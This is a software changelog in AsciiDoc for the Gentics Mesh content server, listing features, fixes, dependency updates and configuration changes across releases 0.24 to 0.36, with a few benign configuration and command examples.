link:https:\/\/github.com\/gentics\/mesh\/issues\/787[#787]\n\nicon:check[] Logging: The default logging configuration now includes the Java class for each log message.\n\n[[v0.36.2]]\n== 0.36.2 (02.07.2019)\n\nicon:check[] Search: Encoding issues which happened on systems which were not using `UTF-8` as the default locale have been fixed by updating the underlying Elasticsearch client. link:https:\/\/github.com\/gentics\/mesh\/issues\/498[#498]\n\nicon:plus[] Search: It is now possible to use encrypted and authenticated connections between Gentics Mesh and Elasticsearch. New settings and environment variables have been added. Details can be found in the link:{{< relref \"elasticsearch.asciidoc\" >}}#_security[Elasticsearch documentation]. link:https:\/\/github.com\/gentics\/mesh\/issues\/759[#759]\n\nicon:plus[] Security: The 'spring-security' library has been updated.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.21\n\nicon:plus[] GraphQL: You can now track ingoing node references. 
See the link:{{< relref \"graphql.asciidoc\" >}}#_loading_ingoing_references[example] in the documentation.\n\nicon:check[] Search: Fixed a bug that caused configured timeouts to not be applied correctly.\n\n[[v0.36.1]]\n== 0.36.1 (18.06.2019)\n\nicon:plus[] Core: Support for Java 11 runtime has been added.\n\nicon:plus[] Docker: The base image of the `gentics\/mesh` and `gentics\/mesh-demo` images have been updated to use the `adoptopenjdk\/openjdk11:x86_64-alpine-jre-11.0.3_7` image.\n\nicon:plus[] Docker: The included Elasticsearch version has been updated to version 6.8.0. Please note that support for embedded Elasticsearch will be dropped in the future.\n\nicon:check[] REST: The deletion of microschemas which contain changes has been fixed. Previously a `NotImplementedException` was thrown for microschemas which contained changes. link:https:\/\/github.com\/gentics\/mesh\/issues\/589[#589]\n\nicon:check[] REST: Error messages should now always be wrapped in JSON. Previously, internal server errors were returned as plain text.\n\nicon:check[] GraphQL: Fixed a bug that caused the default language of a node to be fetched when loading a node list of a micronode.\n\nicon:plus[] Core: Various internal structures and dependencies were re-organized and refactored.\n\nicon:plus[] UI: The default set of enabled languages within the `mesh-ui-config.js` file has been updated to include more languages.\n\n[[v0.36.0]]\n== 0.36.0 (12.06.2019)\n\nCAUTION: Java Rest Client\n\n[quote]\n____\n\nThe default field values for `NodeResponse` and `AbstractGenericRestResponse` has been updated.\n\nThe following values have been changed:\n\n* `AbstractGenericRestResponse#permissions`\n* `NodeResponse#tags`\n* `NodeResponse#childrenInfo`\n* `NodeResponse#container`\n* `NodeResponse#fields`\n* `NodeResponse#breadcrumb`\n\nThe `NodeResponse#isContainer` method has been deprecated and was replaced by `NodeResponse#getContainer`\n\nApplications which use affected models will most likely not need to updated since the returned response will always set the affected fields.\n____\n\nicon:plus[] REST: The `?fields` query parameter which can be used to filter response properties will now work more granularly on node responses.\n\nCAUTION: Custom node migration scripts have been removed.\n\n[quote]\n____\n\nThe script system was a source of possible errors and performance problems. Also, the nashorn javascript engine has been deprecated with the release of Java 11. If you need to change data for a migration, use the REST Api instead.\n____\n\nicon:check[] REST: Fixed a bug that sometimes caused a wrong image to be sent to the client when using image manipulation. link:https:\/\/github.com\/gentics\/mesh\/issues\/669[#669]\n\nicon:plus[] REST: Error messages now contain the property `i18nKey`. This allows for easy identification of different errors.\n\n[[v0.35.0]]\n== 0.35.0 (06.06.2019)\n\nCAUTION: Rest Model: The `BranchResponse#isMigrated` method has been changed to `BranchResponse#getMigrated`.\n\nNOTE: Fetching fields of a node\/micronode in GraphQL requires a different query in `\/api\/v2`. Please refer to the link:https:\/\/github.com\/gentics\/mesh\/issues\/428[#428] and link:https:\/\/github.com\/gentics\/mesh\/issues\/317[#317] for details.\n\nicon:check[] Backup: Fixed `NullPointerException` which occurred when the backup directory was missing and the backup endpoint was invoked. 
link:https:\/\/github.com\/gentics\/mesh\/issues\/463[#463]\n\nicon:plus[] Core: The core Vert.x library was updated to version `3.7.1`.\n\nicon:check[] Focal point: It is now possible to use the `{apiLatest}\/:projectName\/nodes\/:uuid\/binaryTransform\/:fieldName` endpoint to resize an image and set the focal point in one operation.\n\nicon:check[] The `Content-Disposition` header will now contain the UTF-8 and ISO-8859-1 encoded filename. link:https:\/\/github.com\/gentics\/mesh\/issues\/702[#702]\n\nicon:plus[] REST: It is now possible to set a flag that forces a user to change their password on the next login. Take a look at link:{{< relref \"authentication.asciidoc\" >}}#_forcing_user_to_change_password[the documentation] for more information.\n\nicon:check[] REST: Fixed a bug that sometimes caused a wrong image to be returned when using image manipulation. link:https:\/\/github.com\/gentics\/mesh\/issues\/669[#669]\n\n[[v0.34.0]]\n== 0.34.0 (28.05.2019)\n\nicon:bullhorn[] Versioning Enhancements\n\n[quote]\n____\n\nThe versioning system has received various enhancements.\n\nlink:{{< relref \"features.asciidoc\" >}}#auto-purge[Auto Purge]\n\nThe auto purge feature will now automatically purge previous versions of a content which are no longer needed. You can control this behaviour using the `autoPurge` flag in the `mesh.yml` file.\n\nAdditionally, schemas may now contain an `autoPurge` flag to override the setting on a per-schema basis.\n\nThe documentation contains detailed information about how versioning can be controlled.\n\nlink:{{< relref \"features.asciidoc\" >}}#_listing_versions[Listing Versions]\n\nVersions of a node can now be listed via REST and GraphQL.\n\nlink:{{< relref \"features.asciidoc\" >}}#_purging_versions[Purging Versions]\n\nVersions can now be purged across projects to reduce disk storage usage.\n____\n\nicon:check[] Java Rest Client: Fixed a bug that prevented automatic reconnection to the eventbus when it did not succeed immediately.\n\nicon:check[] Upload: The document processing library _tika_ has been updated to version `1.21` to fix potential out-of-memory issues during upload document processing.\n\nicon:check[] Branch Migration: A bug in the branch migration process has been fixed. Previously the wrong version of the content was used as branch root version. The process will now utilize the published version if one exists and otherwise use the draft version. This fix only affected internal data handling.\n\n[[v0.33.1]]\n== 0.33.1 (23.05.2019)\n\nicon:check[] Core: The dependency _hazelcast-kubernetes_ has been set to version 1.2.2 to fix a compatibility issue with the used Hazelcast version.\n\n[[v0.33.0]]\n== 0.33.0 (20.05.2019)\n\nicon:bullhorn[] Elasticsearch document handling\n\n[quote]\n____\n\nThe support for the Elasticsearch ingest plugin has been removed. The same functionality is now provided by a much more efficient implementation which extracts the plain text of a document during upload processing. The structure of the generated search index has not changed and thus no modifications to existing search queries are required.\n\nThe plain text will now also be included in the REST and GraphQL response of binary fields.\n\nAn automatic changelog entry has been added which will parse all uploaded documents and extract the plain text. The duration of the execution of this task depends on the number of documents that need to be parsed.\n\nThe new __mesh.yml__ setting `upload.parserLimit` can be used to control the document parser. 
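See link:{{< relref \"features.asciidoc\" >}}#_text_extraction[Text extraction documentation] for more information.\n\nA minimal `mesh.yml` sketch; the value shown is purely illustrative and the exact semantics of the limit should be taken from the linked documentation:\n\n[source,yaml]\n----\nupload:\n  # Limit for the document parser (illustrative value)\n  parserLimit: 40000\n----\n____\n\n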
See link:{{< relref \"features.asciidoc\" >}}#_text_extraction[Text extraction documentation] for more information.\n____\n\nicon:plus[] Search: The embedded elastichead interface has been removed. It is recommended to use browser extentions like link:https:\/\/chrome.google.com\/webstore\/detail\/elasticsearch-head\/ffmkiejjmecolpfloofpjologoblkegm[ElasticSearch Head for Chrome] instead.\n\nicon:check[] Core: Various internal libraries have been updated (logback, hazelcast-kubernetes, tika)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.19\n\n[[v0.32.0]]\n== 0.32.0 (08.05.2019)\n\nicon:bullhorn[] Event Handling\n\n[quote]\n____\n\nThe event handling mechanism has been completely overhauled.\n\n*Changes*\n\n* Additional events have been added\n* Event payload includes more information\n* Java Models for events have been added\n\n*API*\n\nThe API class `com.gentics.mesh.MeshEvent` was replaced by `com.gentics.mesh.core.rest.MeshEvent`.\n\nA detailed description of this feature can be found in our link:{{< relref \"events.asciidoc\" >}}[Event Documentation].\n____\n\nicon:bullhorn[] Elasticsearch Handling\n\n[quote]\n____\n\nThe Elasticsearch integration has been overhauled.\n\n*Integration*\n\nElasticsearch synchronization operations have been decoupled from regular write operations.\n\nThis has two main effects. First, regular write operations (e.g. Node Update, Node Create) will not block until the changed data has been synchronized with elasticsearch. This will result in higher overall write performance. Secondly, changes will not be directly visible in Elasticsearch since write operations in Elasticsearch have been decoupled and will be executed asynchronously after a element in Gentics Mesh has been modified. Implementations which highly rely on Gentics Mesh being in sync with ES for each operation may need to be adapted. When using the `\/search` or `\/rawSearch` endpoints in mesh, you can now provide the `?wait=true` query parameter. See details link:{{< relref \"elasticsearch.asciidoc\" >}}#endpoints[here]\n\n*Fixes*\n\nVarious issues with the previous Elasticsearch synchronization mechanism have been addressed.\n\n* Deletion of nodes will now also update documents in the index which reference the deleted node\n* Tag and Tag Family deletion will now correctly update referenced tags, tag families and nodes\n\n*Startup*\n\nGentics Mesh will no longer wait for Elasticsearch during start-up.\n\n*Resilience*\n\nThe resilience for Elasticsearch server issues has been improved. Failed requests will automatically be retried. If too many issues occur Gentics Mesh will automatically invoke an index sync in order to recover from the issue. This sync will be retried until Elasticsearch becomes responsive again.\n\n*Syncing*\n\nThe clear and sync mechanism has been streamlined in order to benefit from other changes like resilience.\n\n____\n\nNOTE: It is not required to reindex documents since the index names and structure has not been changed.\n\nicon:check[] File Handling: The file upload mechanism has been overhauled to address issues with blocked uploads which could occur when uploading multiple files in-parallel.\n\nicon:check[] File Handling: Failed Uploads will now remove temporary files from disk. Previously in some error situations the temporary upload have not been removed.\n\nicon:check[] Permissions: Applying permissions recursively on projects did not affect branches. 
This has been fixed.\n\nicon:plus[] Permissions: Setting permissions recursively is now done more efficiently.\n\nicon:plus[] Thread Usage: The overall request handling has been refactored to reduce situations in which the event-loop threads could be blocked. The request handling code has been unified.\n\nicon:plus[] Core: The core Vert.x library was updated to version 3.7.0\n\nicon:plus[] Performance: The overall read performance has been improved. The memory usage has been reduced.\n\n[[v0.31.6]]\n== 0.31.6 (27.05.2019)\n\nicon:check[] Java Rest Client: Fixed a bug that prevented automatic reconnection to the eventbus when it did not succeed immediately.\n\n[[v0.31.5]]\n== 0.31.5 (07.05.2019)\n\nicon:check[] REST: The `publish` and `readPublished` permissions are now only shown for nodes.\n\nicon:check[] Core: Creation of schemas with the same name as an existing microschema or vice versa is not allowed anymore. Doing so caused conflicts in GraphQL. link:https:\/\/github.com\/gentics\/mesh\/issues\/597[#597]\n\nicon:check[] Core: A bug in the image transform endpoint has been fixed. Previously nodes which were updated using that endpoint could not be found via webroot anymore. link:https:\/\/github.com\/gentics\/mesh\/issues\/599[#599]\n\nicon:plus[] Job: The endpoint `POST {apiLatest}\/admin\/jobs\/:jobUuid\/process` has been added. It can be used to trigger job processing. The endpoint will also automatically reset a failed job to be queued again. The endpoints `DELETE {apiLatest}\/admin\/jobs\/:jobUuid\/error` and `POST {apiLatest}\/admin\/processJobs` will be removed in a future release. link:https:\/\/github.com\/gentics\/mesh\/issues\/171[#171]\n\nicon:check[] Plugins: A `NullPointerException` has been fixed which occurred when accessing `rc.user().principal()` within a plugin. link:https:\/\/github.com\/gentics\/mesh\/issues\/516[#516]\n\nicon:check[] REST: Creating a schema with a micronode field and the allow option set to `[]` will now allow micronodes of all microschemas. link:https:\/\/github.com\/gentics\/mesh\/issues\/431[#431]\n\nicon:check[] Core: Fixed a bug that caused an internal server error when applying changes to a microschema. link:https:\/\/github.com\/gentics\/mesh\/issues\/591[#591]\n\nicon:check[] UI: Fixed validation issues in microschema lists when updating nodes. Previously validation issues would not be detected by the UI and the node update would fail. link:https:\/\/github.com\/gentics\/mesh-ui\/pull\/202[#202]\n\n[[v0.31.4]]\n== 0.31.4 (11.04.2019)\n\nicon:check[] Schema: The `container` flag in the schema update request is now optional. Omitting the value will no longer cause Gentics Mesh to use the default value `false`. Subsequently the Java request model was altered. The `Schema#isContainer` method was replaced with `Schema#getContainer`. Older REST client versions which by default always specified the container flag are still compatible with this change. link:https:\/\/github.com\/gentics\/mesh\/issues\/165[#165]\n\nicon:check[] GraphQL: The permission check for the `nodes` field of the type `Tag` has been fixed. Previously loading tagged nodes for a tag did not return the expected result. The `published` permission for published nodes was not checked correctly. This has been fixed now.\n\nicon:plus[] Logging: The default `logback.xml` file has been updated to include automatic scan of the logging configuration. 
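This change will not be applied to existing configurations.\n\nFor existing installations the same effect can be achieved manually; a minimal sketch of the relevant `logback.xml` attributes (the scan interval shown is illustrative):\n\n[source,xml]\n----\n<configuration scan=\"true\" scanPeriod=\"60 seconds\">\n  <!-- existing appenders and loggers remain unchanged -->\n<\/configuration>\n----\n\n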
icon:check[] Schema: It is now possible to reset the `allow` property of string fields. Setting `allow` to an empty array will no longer restrict the values. Instead it will revert to the original behaviour and allow all values.\n\nicon:check[] UI: Fixed a bug that caused the node list to jump to the first page on various actions. link:https:\/\/github.com\/gentics\/mesh-ui\/issues\/195[#195]\n\n[[v0.31.3]]\n== 0.31.3 (28.03.2019)\n\nicon:plus[] Logging: The conflict error logging has been improved. Conflict error information in the log will now be more detailed and also include the conflicting field key and versions.\n\nicon:check[] Permissions: A bug in the GraphQL `nodes` field was fixed. Previously branches were not correctly handled and too many nodes would be returned. Additionally the field would not correctly handle the read published permission and would also return draft nodes to which no read permission was granted.\n\n[[v0.31.2.1]]\n== 0.31.2.1 (23.08.2019)\n\nicon:plus[] Logging: Additional activity information will be logged when the logger for class `io.vertx.core.eventbus.EventBus` is set to level `DEBUG`.\n\nicon:check[] REST: Fixed a bug which prevented the `DELETE \/api\/v1\/admin\/jobs\/:jobUuid\/error` endpoint from resetting the job.\n\n[[v0.31.2]]\n== 0.31.2 (22.03.2019)\n\nicon:plus[] Docker: Default memory settings for the server and demo docker images were updated. The `-Dstorage.diskCache.bufferSize=256` setting has been added for the server image. The setting can be changed using the `JAVA_TOOL_OPTIONS` environment variable. See link:https:\/\/getmesh.io\/docs\/administration-guide\/#_memory_settings[Memory documentation] for more information and recommendations.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.18.\n\nicon:check[] REST: The `GET {apiLatest}\/:projectName\/nodes\/:nodeUuid\/binary\/:fieldName` endpoint will now always include the `accept-ranges: bytes` header to indicate to the client that it supports range requests. link:https:\/\/github.com\/gentics\/mesh\/issues\/643[#643]\n\nicon:check[] Configuration: The Elasticsearch bulk limit can now be configured using the `MESH_ELASTICSEARCH_BULK_LIMIT` environment variable.\n\nicon:check[] Permissions: A bug in the GraphQL permission handling has been fixed. Previously nodes which had only the read published permission assigned to them were not returned using the `nodes` field.\n\nicon:check[] Permissions: A bug in the permission handling of the nav root endpoint has been fixed. Previously nodes which had only the read published permission assigned to them were not included in the navigation response.\n\n[[v0.31.1]]\n== 0.31.1 (18.03.2019)\n\nicon:plus[] GraphDB Import\/Export: The endpoints `POST {apiLatest}\/admin\/graphdb\/export` and `POST {apiLatest}\/admin\/graphdb\/import` have been added.\n\n[[v0.31.0]]\n== 0.31.0 (13.03.2019)\n\nicon:bullhorn[] Monitoring\n\n[quote]\n____\nThis version of Gentics Mesh introduces the __Monitoring feature__.\n\nThe Gentics Mesh server will now bind to port `8081` *in addition* to port `8080` in order to provide the new monitoring API. 
New configuration settings have been added to allow configuration of this server.\n\nNOTE: The monitoring API should not be exposed publicly and will by default only bind to `localhost`.\n\nA detailed description of this feature can be found in our link:{{< relref \"monitoring.asciidoc\" >}}[Monitoring Documentation].\n____\n\nCAUTION: In a future release the following endpoints will be removed from the regular API (Port 8080) since they were moved to the new monitoring server API (Port 8081).\n\n* `GET {apiLatest}\/admin\/status` (Server Status)\n* `GET {apiLatest}\/admin\/cluster\/status` (Cluster Status)\n\nCAUTION: Because of a change in the image resizer, the change below might not apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be cleared.\n\nicon:plus[] Image: Quality of manipulated JPEG images can now be configured. The default value has been changed from `0.7` to `0.95`.\n\nicon:plus[] Image: The filter for resizing images can now be configured. The default filter is Lanczos.\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.17.\n\nicon:plus[] REST: The `\/users` endpoint response will now contain a hash of a user's roles.\n\nicon:plus[] GraphQL: The `roles` field is now available for user fields, and contains all roles of the respective user.\n\nicon:plus[] GraphQL: The `rolesHash` field is now available for user fields, and contains a hash of all the roles of the respective user. This field does not need any special permissions.\n\nicon:check[] Fixed a bug in the consistency checks which incorrectly reported missing user role shortcuts.\n\nicon:check[] Schema: A bug was fixed which prevented updating the `elasticsearch` property of schema fields to the value null.\n\nicon:plus[] Docker: Default memory settings for the server and demo docker images were added. Default for server is set to `-Xms512m -Xmx512m -XX:MaxDirectMemorySize=256m`. The setting can be changed using the `JAVA_TOOL_OPTIONS` environment variable. See link:https:\/\/getmesh.io\/docs\/administration-guide\/#_memory_settings[Memory documentation] for more information.\n\nicon:check[] The `.vertx` cache folder was moved to the configurable `data\/tmp` folder.\n\n[[v0.30.2]]\n== 0.30.2 (28.02.2019)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.16 - This update addresses various locking and synchronization issues when clustering is enabled.\n\nicon:check[] Restore: The restore process has been reworked to avoid issues with graph database indices. Additional error handling has been added.\n\nicon:check[] Backup: Backup support for clustered mode has been added. The backup endpoint previously did not work as expected in clustered mode.\n\n[[v0.30.1]]\n== 0.30.1 (15.02.2019)\n\nicon:plus[] GraphQL: Nodes can now be loaded via a list of UUIDs.\n\nicon:check[] Java Rest Client: Fixed a bug that occurred when calling `getResponse()` with `getBody()` on a binary response.\n\nicon:check[] Java Rest Client: Fixed a bug in the `MeshRestClient#isOneOf` helper function.\n\n[[v0.30.0]]\n== 0.30.0 (12.02.2019)\n\nCAUTION: Java Rest Client: The Gentics Mesh Java REST client which was based on Vert.x was replaced with an `OkHttpClient` implementation. Some changes to the client interface were necessary to make the client independent of Vert.x. 
See link:https:\/\/getmesh.io\/docs\/platforms\/#_java[this example] and the Javadoc for more information.\n\nicon:check[] Clustering: The mesh version will no longer be appended to the node name used for OrientDB clustering. It is recommended to sanitize the `data\/graphdb\/storage\/distributed-db-config.json` file and remove\/rename entries which reference older mesh nodes. Only the active nodes should be listed in the file.\n\nicon:check[] Core: Fixed a bug that caused overly long responses for binary range requests.\n\nicon:check[] GraphQL: Fixed a bug when loading a node via path. When the node itself did not exist, the query would return its parent node.\n\n[[v0.29.10]]\n== 0.29.10 (08.02.2019)\n\nicon:check[] Clustering: Cluster stability has been increased by reducing concurrent transaction locks during delete requests.\n\n[[v0.29.9]]\n== 0.29.9 (07.02.2019)\n\nicon:check[] Clustering: Cluster stability has been increased by reducing concurrent transaction locks during create\/update requests.\n\n[[v0.29.8]]\n== 0.29.8 (05.02.2019)\n\nicon:check[] Clustering: The mesh version will no longer be appended to the node name used for OrientDB clustering. It is recommended to sanitize the `data\/graphdb\/storage\/distributed-db-config.json` file and remove\/rename entries which reference older mesh nodes. Only the active nodes should be listed in the file.\n\n[[v0.29.7]]\n== 0.29.7 (05.02.2019)\n\nicon:check[] Clustering: The default `writeQuorum` has been set to `majority` to increase cluster stability. A `writeQuorum` of `1` can cause synchronization issues.\n\nicon:check[] Elasticsearch: The Elasticsearch synchronization verticle will no longer be deployed when no Elasticsearch has been configured.\n\n[[v0.29.6]]\n== 0.29.6 (01.02.2019)\n\nicon:plus[] Core: The way editor references are stored has been refactored to increase performance and reduce contention during database operations. A changelog entry will be invoked which migrates the data.\n\n[[v0.29.5]]\n== 0.29.5 (31.01.2019)\n\nicon:check[] Clustering: The creation of edges which lead to higher contention in the graph has been removed from jobs. Jobs will currently no longer reference the creator.\n\nicon:check[] Search: An error which was thrown by outdated branch schema assignments has been suppressed. A warning will be logged instead.\n\n[[v0.29.4]]\n== 0.29.4 (28.01.2019)\n\nicon:check[] Restore: A check has been added which will disable the restore operation while running in clustered mode.\n\nicon:check[] Demo: The demo has been fixed. Previously some of the demo files were missing.\n\n[[v0.29.3]]\n== 0.29.3 (25.01.2019)\n\nicon:plus[] OrientDB: The included OrientDB version has been updated to version 3.0.14\n\nicon:check[] Core: The job processing will no longer be invoked in an interval in order to reduce cluster operation contention. 
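Instead the `{apiLatest}\/admin\/processJobs` endpoint can be used to manually trigger job processing, for example (authentication is omitted and the host and API base path are illustrative):\n\n[source,bash]\n----\n# Manually trigger the processing of queued jobs\ncurl -X POST \"http:\/\/localhost:8080\/api\/v1\/admin\/processJobs\"\n----\n\n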
icon:check[] Core: Fixed a bug that caused nodes with a slash in their segment field to not be found via webroot.\n\nicon:check[] Restore: A `ClassCastException` has been fixed which could be observed directly after a backup restore operation.\n\nicon:check[] Changelog: The automatic backup of OrientDB configurations which was executed during the 0.29.0 update has been removed.\n\n[[v0.29.2]]\n== 0.29.2 (18.01.2019)\n\nicon:plus[] Changelog: The changelog execution performance has been increased.\n\nicon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.\n\nicon:check[] Restore: An error will be returned when `{apiLatest}\/admin\/graphdb\/restore` is invoked in clustered mode. Restoring the database is not possible in this mode.\n\nicon:check[] Elasticsearch: Fixed a bug that caused a schema migration to never be finished. This affected nodes with binaries that are readable by the Elasticsearch Ingest Attachment Processor Plugin.\n\nicon:check[] Image: Resizing images will now use the balanced quality setting. This helps with images that suffered from visible aliasing. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be cleared.\n\n[[v0.29.1]]\n== 0.29.1 (16.01.2019)\n\nCAUTION: Because of a change in the image cache, the change below might not apply when an image is already in the cache. To make sure that the changes take effect, the cache in `data\/binaryImageCache\/` must be cleared.\n\nicon:plus[] Core: Performance of the deletion process has been increased.\n\nicon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.\n\nicon:plus[] Consistency Checks: The consistency endpoint response will now also list a `repairCount` property which lists the count of repair operations.\n The response will now only contain the first 200 results. The `outputTruncated` property indicates whether the result has been truncated.\n\nicon:check[] Image: Resizing and cropping will no longer transform the image to JPG format but return an image in the original format. When no image writing plugin for this format is available the fallback is PNG.\n\nicon:check[] Core: Node deletion will now also remove connected lists and micronodes. Previously these elements were not properly removed. On large systems this could lead to increased disk usage.\n\n[[v0.29.0]]\n== 0.29.0 (14.01.2019)\n\nCAUTION: The embedded Graph Database was updated from version 2.2.37 to 3.0.13. See required changes below.\n\nicon:plus[] OrientDB 3.0.x: Existing `orientdb-server-config.xml`, `hazelcast.xml`, `default-distributed-db-config.json` configuration files will automatically be moved away and the new configuration files will be created instead.\n\nicon:plus[] OrientDB 3.0.x: A reindex of all vertices and edges will be triggered during the first start-up. This can take some time depending on the database size.\n\nicon:plus[] Memory: The internal overall memory usage has been optimized.\n\nicon:plus[] Core: The way language references are stored has been refactored to increase performance and reduce contention during database operations. 
A changelog entry will be invoked which migrates the data.

icon:check[] Clustering: The OrientDB 3.0.13 update addresses various issues which were related to clustering.

icon:check[] Migrations: The schema migration code has been optimized for speed and memory usage.

icon:check[] Migrations: Schema migrations will now always be executed on the cluster node which also handled the REST request. Previously the migration was executed on a random node in the cluster.

icon:check[] Core: The internal transaction retry max count has been reduced from 100 to 10 iterations.

icon:check[] Core: The internal transaction handling has been optimized.

icon:check[] Security: A minor security issue has been fixed.

[[v0.28.3]]
== 0.28.3 (09.01.2019)

icon:check[] GraphQL: Resolved links will now contain the hostname of the target branch, not the latest branch.

icon:check[] Elasticsearch: Search indices are now created sequentially. Parallel creation of indices caused problems when many indices had to be created.

icon:plus[] Core: When resolving links with type FULL, and the chosen branch is not the latest branch, the query parameter for the branch will be added to the rendered link.

icon:plus[] Java Rest Client: Added a new REST client implementation. The `MeshRestOkHttpClientImpl` implementation will replace the current Java client in a future release. It is advised to switch to the new implementation, which is based on the OkHttp library instead of Vert.x.

[[v0.28.2]]
== 0.28.2 (26.11.2018)

icon:check[] Changelog: The changelog entry fix from release `0.28.1` has been enhanced to fix additional issues.

[[v0.28.1]]
== 0.28.1 (26.11.2018)

icon:plus[] Java Rest Client: The `version` property of the `NodeUpdateRequest` is now set to `draft` by default. Setting the value to draft will override the conflict detection handling and always compare the posted data with the latest draft version.

icon:plus[] Java Rest Client: The `upsertNode` method has been added to the REST client, which can be used to create or update a node.

icon:plus[] Demo: The example uuids and dates in the `{apiLatest}/raml` response and the documentation are now static and will no longer change between releases. link:https://github.com/gentics/mesh/issues/477[#477]

icon:plus[] Core: Deletion of micronode and list field data has been implemented in the core. Previously these elements were not removed from the graph. link:https://github.com/gentics/mesh/issues/192[#192]

icon:check[] Changelog: Fixed a bug in the webroot index database migration entry which caused an `ORecordDuplicatedException` changelog error and prevented the update and startup of older databases. link:https://github.com/gentics/mesh/issues/554[#554], link:https://github.com/gentics/mesh/issues/546[#546]

icon:check[] Core: Fixed a bug that caused link:https://getmesh.io/docs/api/#project__branches__branchUuid__migrateSchemas_post[/migrateSchemas] to fail when a newer schema version was not assigned to the branch. link:https://github.com/gentics/mesh/issues/532[#532]

icon:check[] Core: Nodes are now migrated to the newest schema version when a new branch is created.
link:https://github.com/gentics/mesh/issues/521[#521]

icon:check[] Core: Fixed a bug that prevented moving a published node in one language to a published container of another language.

[[v0.28.0]]
== 0.28.0 (20.11.2018)

CAUTION: The property `meshNodeId` of the `{apiLatest}/` response was renamed to `meshNodeName` to be more consistent.

icon:plus[] REST: It is now possible to set existing or new tags during node creation and node update. Tags that are listed in both of those requests will be created if not found and assigned to the updated or created node.

icon:plus[] Eventbus: It is now possible to register custom eventbus addresses.

icon:plus[] REST: Download of binaries will now support byte range requests. Web media players require this feature in order to support seeking in video streams.

icon:plus[] API: Made OAuth2 server options overridable via environment variables.

icon:check[] Permissions: A bug in the permission handling has been fixed. Previously the read permission was also granted when create was granted to elements. link:https://github.com/gentics/mesh/issues/562[#562]

icon:check[] Branches: Resolved links will now contain the hostname of the target branch, not the latest branch.

icon:check[] Elasticsearch: The check for the `ingest-attachment` plugin was fixed for installations which were using the `AWS` Elasticsearch service.

icon:check[] REST: A concurrency issue has been fixed which could lead to problems when creating multiple schemas in parallel.

icon:check[] REST: Fixed the error message which is returned when no node for a content can be found. link:https://github.com/gentics/mesh/issues/364[#364]

[[v0.27.2]]
== 0.27.2 (07.11.2018)

icon:check[] REST: The CPU utilization for download requests has been reduced. link:https://github.com/gentics/mesh/issues/530[#530]

icon:plus[] Core: The Gentics Mesh server will now use native bindings to increase HTTP performance on Linux x86_64 platforms.

icon:check[] REST: Branch create requests will now correctly set the path prefix property. The value of the property was previously not used.

icon:check[] REST: Added more detailed error information when accessing a resource without permission. link:https://github.com/gentics/mesh/issues/314[#314]

[[v0.27.1]]
== 0.27.1 (31.10.2018)

icon:plus[] REST: It is now possible to specify a path prefix for branches. When specified, all resolved paths will include the prefix. The webroot endpoint will also utilize the prefix to resolve nodes. The prefix can be set for new projects or for update requests on existing branches.

icon:check[] Java REST Client: Fixed wrong log output information.

icon:check[] REST: Fixed an error while fetching jobs for deleted projects.

icon:plus[] Elasticsearch: The index sync will now automatically remove indices which are no longer used.

icon:check[] REST: Fixed an error that could happen when creating new nodes which contain binary fields that reference a not yet stored binary sha512sum. link:https://github.com/gentics/mesh/issues/524[#524]

[[v0.27.0]]
== 0.27.0 (19.10.2018)

CAUTION: The volumes inside the docker images `gentics/mesh` and `gentics/mesh-demo` have been refactored. By default the volumes `/graphdb`, `/uploads`, `/backups`, `/plugins`, `/keystore` and `/config` will be used for the corresponding data. The `/data` volume and location was removed. Details can be found in the link:{{< relref "administration-guide.asciidoc" >}}#_volumes_locations[documentation].
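A hedged sketch of the new volume layout (the host paths are examples only):

[source,bash]
----
# Mount each of the new volume locations explicitly instead of the removed /data volume.
docker run -d -p 8080:8080 \
  -v /opt/mesh/graphdb:/graphdb \
  -v /opt/mesh/uploads:/uploads \
  -v /opt/mesh/backups:/backups \
  -v /opt/mesh/plugins:/plugins \
  -v /opt/mesh/keystore:/keystore \
  -v /opt/mesh/config:/config \
  gentics/mesh
----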
icon:plus[] Configuration: It is now possible to configure the upload limit using the `MESH_BINARY_UPLOAD_LIMIT` environment variable.

icon:plus[] Java REST Client: It is now possible to set the base path of the API via `MeshRestClient#setBaseUri(String uri)`.

icon:check[] Security: A minor security issue has been fixed.

icon:check[] REST: An issue with the ETag generation of user responses has been fixed. link:https://github.com/gentics/mesh/issues/489[#489]

[[v0.26.0]]
== 0.26.0 (15.10.2018)

icon:plus[] Branches: It is now possible to set the "latest" branch of a project.

icon:plus[] Branches: It is now possible to create branches based on specific other branches.

icon:plus[] Branches: Branches can now be tagged just like nodes.

icon:plus[] Clustering: The Hazelcast kubernetes autodiscovery plugin was added to Gentics Mesh. It is now possible to use this plugin to discover nodes in a k8s environment. Take a look at our link:{{< relref "clustering.asciidoc" >}}#_kubernetes[documentation] for more details.

icon:check[] Java REST Client: Added more detailed error information to the `MeshRestClientMessageException` class.

[[v0.25.0]]
== 0.25.0 (08.10.2018)

icon:plus[] Plugins: It is now possible to override the plugin config in a `config.local.yml` file.

icon:plus[] Core: The core Vert.x library was updated to version 3.5.4

icon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.37

icon:plus[] GraphQL: Added filters for users, groups and roles.

icon:check[] GraphQL: GraphQL Java has been updated to version 10.0

icon:check[] Core: Loading of older jobs could cause an error. The causes of those errors have been fixed.

icon:check[] Migration: Fixed a migration regression which was introduced with 0.24.1

icon:check[] Demo: Fixed the demo webroot path handling. This fix only affects new demo setups.

[[v0.24.1]]
== 0.24.1 (02.10.2018)

icon:plus[] Config: It is now possible to configure the path to the mesh lock file using the `MESH_LOCK_PATH` environment variable. link:https://github.com/gentics/mesh/issues/506[#506]

icon:plus[] It is now possible to add custom languages by configuration.

icon:check[] UI: Added a scrollbar to the schema dropdown menu. link:https://github.com/gentics/mesh-ui/pull/163[#163]

icon:check[] Core: An inconsistency within the webroot path handling has been fixed. Previously the webroot path uniqueness checks would not work correctly once another branch had been added.

icon:check[] REST: The response error code handling for uploads has been updated. Previously no error 413 was returned when the upload limit was reached.

icon:check[] Elasticsearch: The initial sync check will be omitted if no Elasticsearch has been configured.

icon:check[] Java REST Client: Fixed a bug that could lead to duplicate request headers.

[[v0.24.0]]
